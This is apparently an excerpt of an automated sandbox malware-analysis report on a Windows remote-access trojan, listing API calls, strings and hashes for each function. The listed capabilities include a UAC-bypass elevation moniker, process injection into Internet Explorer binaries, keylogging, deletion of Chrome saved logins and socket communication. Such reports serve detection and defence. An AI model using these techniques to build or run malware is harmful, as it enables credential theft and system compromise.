                                                          • Opcode ID: b6601ed24abfed9cf7fe240a2c5566a7417a315aa523f1e37220b92a7528f2ec
                                                          • Instruction ID: a6dc46a1ac747b1df6f49b20b287b9a63e2ec98da8de7deae82efe0a0170cbcd
                                                          • Opcode Fuzzy Hash: b6601ed24abfed9cf7fe240a2c5566a7417a315aa523f1e37220b92a7528f2ec
                                                          • Instruction Fuzzy Hash: A82137711047009BC714BBB1DC5AAAF7669AF94B06F00443FF907A61E2EF38C945C76A
                                                          Function 0040E2F1 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 212processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,004750FC), ref: 0040E30B
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,004750FC), ref: 0040E336
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E352
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E3D5
                                                          • CloseHandle.KERNEL32(00000000,?,?,004750FC), ref: 0040E3E4
                                                            • Part of subcall function 004128AD: RegCreateKeyA.ADVAPI32(80000001,00000000,TeF), ref: 004128BB
                                                            • Part of subcall function 004128AD: RegSetValueExA.KERNEL32(TeF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128D6
                                                            • Part of subcall function 004128AD: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128E1
                                                          • CloseHandle.KERNEL32(00000000,?,?,004750FC), ref: 0040E449
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                          • API String ID: 726551946-1743721670
                                                          • Opcode ID: fe7551fdfbdcf3ebe62b75ae427e45e4e23c61079ab323ff6510b1fdea246979
                                                          • Instruction ID: 57de327b15d82dbd2eac346b6cac6cdabb084366653080b34320caf9a24139d1
                                                          • Opcode Fuzzy Hash: fe7551fdfbdcf3ebe62b75ae427e45e4e23c61079ab323ff6510b1fdea246979
                                                          • Instruction Fuzzy Hash: A17150311043419BC714FB62D8529AFB7A5AFD1358F400D3EF986631E2EF389919CA9A
                                                          Function 0044804A Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370timeCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 004480CC
                                                          • _free.LIBCMT ref: 004480F0
                                                          • _free.LIBCMT ref: 00448277
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045E478), ref: 00448289
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0047279C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448301
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727F0,000000FF,?,0000003F,00000000,?), ref: 0044832E
                                                          • _free.LIBCMT ref: 00448443
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • String ID: xE$xE
                                                          • API String ID: 314583886-1741595589
                                                          • Opcode ID: d596b97672170a59560d370264e130457457ea9fa8a9b0ba60a97bf2640f5a79
                                                          • Instruction ID: 53eab31d398634ed2913b9f897b2f59caf849b5b19a8cc02276c673e3ebcc531
                                                          • Opcode Fuzzy Hash: d596b97672170a59560d370264e130457457ea9fa8a9b0ba60a97bf2640f5a79
                                                          • Instruction Fuzzy Hash: 24C14731904205ABFB249F698D81AAF7BB8EF41310F2441AFE88497351EF798E42C75C
                                                          Function 0041894A Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$1$2$3$4$5$6$7
                                                          • API String ID: 0-3177665633
                                                          • Opcode ID: 52b676760061c84767d297b93dc47341045c93b1f976ba96d1747faf8790e9a2
                                                          • Instruction ID: a206eb20bee8e87b23b85030021c48398d73e585fead2f4b7fd4ae1d02439eb2
                                                          • Opcode Fuzzy Hash: 52b676760061c84767d297b93dc47341045c93b1f976ba96d1747faf8790e9a2
                                                          • Instruction Fuzzy Hash: EA61D5B4108301AEDB00EF21C862FEA77E4AF95750F44485EF591672E2DF78AA48C797
                                                          Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,00475108), ref: 00409B3F
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                          • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                          • GetKeyState.USER32(00000010), ref: 00409B5C
                                                          • GetKeyboardState.USER32(?,?,00475108), ref: 00409B67
                                                          • ToUnicodeEx.USER32(0047515C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                          • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                          • ToUnicodeEx.USER32(0047515C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                          • String ID: `kG
                                                          • API String ID: 1888522110-3643241581
                                                          • Opcode ID: c97b305c4e5192c039be4b57959f7d148ad44e176559ca20096398a0f42faa8b
                                                          • Instruction ID: 5852d3e9e60d78bbc7fecef5f6baa999b7b2ba0a9f64a262714a670a3ee03c46
                                                          • Opcode Fuzzy Hash: c97b305c4e5192c039be4b57959f7d148ad44e176559ca20096398a0f42faa8b
                                                          • Instruction Fuzzy Hash: 3B318F72504308AFD700DF91DC45FDBB7ECEB88715F01083AB645D61A1DBB5E9488B9A
                                                          Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00406788
                                                          • CoGetObject.OLE32(?,00000024,004669B0,00000000), ref: 004067E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Object_wcslen
                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                          • API String ID: 240030777-3166923314
                                                          • Opcode ID: 37d5bffcbb8f4b2cbb961f9636bb3800fd08e5c8d40d037755d6192962cbe9cf
                                                          • Instruction ID: 6c9b37094527eb08cc4748ecdfbd23cbc672ad5faa28133fe458ce4522bc368c
                                                          • Opcode Fuzzy Hash: 37d5bffcbb8f4b2cbb961f9636bb3800fd08e5c8d40d037755d6192962cbe9cf
                                                          • Instruction Fuzzy Hash: B11133B29011186ADB10FAA58955A9E77BCDB48714F11047FF905F3281E77C9A0486BD
                                                          Function 00419AB8 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00475920), ref: 00419ACE
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419B1D
                                                          • GetLastError.KERNEL32 ref: 00419B2B
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 00419B63
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                          • String ID:
                                                          • API String ID: 3587775597-0
                                                          • Opcode ID: b6999ea4fecf3263421b7913bbd2d185f7a70e8b7a5c33fd228c391ba2809cc5
                                                          • Instruction ID: 410433f0f292194423399e5208e7b63ee2478b974df0930e3a7ace9da88798fe
                                                          • Opcode Fuzzy Hash: b6999ea4fecf3263421b7913bbd2d185f7a70e8b7a5c33fd228c391ba2809cc5
                                                          • Instruction Fuzzy Hash: C28142311043049BC314FB21DC95DAFB7A8BF94718F50492EF582621D2EF78EA09CB9A
                                                          Function 0041B63A Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B694
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B6C6
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004752F0,00475308), ref: 0041B734
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B741
                                                            • Part of subcall function 0041B63A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B717
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B76C
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B773
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,004752F0,00475308), ref: 0041B77B
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B78E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                          • String ID:
                                                          • API String ID: 2341273852-0
                                                          • Opcode ID: 29d361786a175de539fdf9d753c964fcdbe74632238a9f507c15aa3fc292f646
                                                          • Instruction ID: 009c1ade3c0c7cd9a9baeecb78710ce3116f293085b5e5d3e47bbce280e6f24a
                                                          • Opcode Fuzzy Hash: 29d361786a175de539fdf9d753c964fcdbe74632238a9f507c15aa3fc292f646
                                                          • Instruction Fuzzy Hash: 2931937180521CAACB20E7B19C89FDA777CAF55304F0404EBF515E2181EF799AC4CB69
                                                          Function 0041301D Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 004130F2
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 004130FE
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004132C5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004132CC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                          • API String ID: 2127411465-314212984
                                                          • Opcode ID: f9d3c1334e6b58d2f1d69f0e1f1c65ab6f379f9836b455ed853577fe27a59fe1
                                                          • Instruction ID: 0508f95716d3db9771c6b78d28bd3d55684df0f5bc265fe56362dad8d88080f3
                                                          • Opcode Fuzzy Hash: f9d3c1334e6b58d2f1d69f0e1f1c65ab6f379f9836b455ed853577fe27a59fe1
                                                          • Instruction Fuzzy Hash: CEB1A371A043006BC614FA76CC979BE76695F9471CF40063FF846B31E2EE7C9A48869B
                                                          Function 00418E5F Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 245fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 004190B5
                                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419181
                                                            • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Find$CreateFirstNext
                                                          • String ID: PSG$NG$VG$VG
                                                          • API String ID: 341183262-216422830
                                                          • Opcode ID: 83c192f71006e540b44aec1a451125091b4ed41390244d5e4dd7200b9adb984b
                                                          • Instruction ID: 0b04574543ffaf1c42473f802d0f517b04b5d48d9dde9d4f65c428d20583ff9f
                                                          • Opcode Fuzzy Hash: 83c192f71006e540b44aec1a451125091b4ed41390244d5e4dd7200b9adb984b
                                                          • Instruction Fuzzy Hash: AF8150315042405AC314FB71C8A6EEF73A8AFD0718F50493FF946671E2EF389A49C69A
                                                          Function 004515C7 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                            • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                            • Part of subcall function 004470CF: _free.LIBCMT ref: 0044712E
                                                            • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 0044713B
                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004516D3
                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0045172E
                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0045173D
                                                          • GetLocaleInfoW.KERNEL32(?,00001001,00443EFC,00000040,?,0044401C,00000055,00000000,?,?,00000055,00000000), ref: 00451785
                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00443F7C,00000040), ref: 004517A4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                          • String ID: (E
                                                          • API String ID: 745075371-542121585
                                                          • Opcode ID: a84efe1a2cce186fb5bbf2749623e7c2965abdb2206941bc4280497163ca2dcb
                                                          • Instruction ID: 0c55cced660072bbdea70b00f38c40adf5ab32faa3293abc4b1f14fb3cf6f882
                                                          • Opcode Fuzzy Hash: a84efe1a2cce186fb5bbf2749623e7c2965abdb2206941bc4280497163ca2dcb
                                                          • Instruction Fuzzy Hash: EB5193719002059BDB10EFA5CC41BBF77B8AF04706F18056BFD11EB262DB789949CB69
                                                          Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                          • GetLastError.KERNEL32 ref: 0040B261
                                                          Strings
                                                          • UserProfile, xrefs: 0040B227
                                                          • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                          • API String ID: 2018770650-1062637481
                                                          • Opcode ID: 485085ca9485ae7de43c789173eb7e4eeafaf3e498a45dc593bc2edb8373611b
                                                          • Instruction ID: af3d5975f8ef5736f4e1f689bc2271043fd855ebe8bb8600121af3fad6928989
                                                          • Opcode Fuzzy Hash: 485085ca9485ae7de43c789173eb7e4eeafaf3e498a45dc593bc2edb8373611b
                                                          • Instruction Fuzzy Hash: 5C01D63168010597CA0476B6DC6F8AF3B24E921708B10017FF802731E2FF3A9905C6DE
                                                          Function 00416C9D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416CAA
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00416CB1
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416CC3
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416CE2
                                                          • GetLastError.KERNEL32 ref: 00416CE8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 3534403312-3733053543
                                                          • Opcode ID: 594fceb9dcf720018193b7af68db4771e8a957862718425d2e1bf0ede3cec24e
                                                          • Instruction ID: cb90277d3e2bb8506008076be0b211c0c8a285b816e0fe18bd298ac82c07c5c8
                                                          • Opcode Fuzzy Hash: 594fceb9dcf720018193b7af68db4771e8a957862718425d2e1bf0ede3cec24e
                                                          • Instruction Fuzzy Hash: EEF0DA75901229BBDB109B91DC4DEEF7EBCEF05656F110065B805B20A2DE748A08CAA5
                                                          Function 00453110 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                          • API String ID: 4168288129-2761157908
                                                          • Opcode ID: 1bf5a653629e57a1f7b5c3ded9cb374cb4a646758b38e4d76f229b2a49b28d64
                                                          • Instruction ID: c7cd0fe6fb368e325f13a714a82e3d7b4865f9b831a19f2b9b664dd372279c0a
                                                          • Opcode Fuzzy Hash: 1bf5a653629e57a1f7b5c3ded9cb374cb4a646758b38e4d76f229b2a49b28d64
                                                          • Instruction Fuzzy Hash: 58C27171D046288FDB25CE28DD407EAB3B5EB84346F1541EBD84DE7242E778AE898F44
                                                          Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 004089AE
                                                            • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                            • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
